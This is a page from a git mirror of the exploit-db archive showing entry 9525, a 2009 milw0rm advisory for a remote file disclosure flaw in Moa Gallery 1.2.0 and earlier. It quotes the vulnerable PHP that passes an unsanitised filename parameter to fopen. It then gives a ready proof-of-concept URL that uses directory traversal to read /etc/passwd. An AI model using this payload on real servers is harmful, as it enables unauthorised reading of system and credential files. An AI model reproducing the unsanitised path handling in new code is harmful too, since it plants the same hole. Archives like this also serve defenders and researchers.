bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/9525.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

15 lines
No EOL
450 B
Text
Raw Blame History

Moa Gallery <= 1.2.0 Remote File Disclosure Vulnerability
Code In sources\_template_parser.php
$filename = $MOA_PATH."templates/".$template_name."/".$p_filename;
$fp = @fopen($filename, "r");
if ((!$fp) && (is_bool($fp)))
{
$fp = $fp = @fopen($MOA_PATH."templates/MoaDefault/".$p_filename, "r");
POC
/sources/_template_parser.php?p_filename=../../../../../../../../../../../../../../../etc/passwd
# milw0rm.com [2009-08-26]
Reference in a new issue View git blame Copy permalink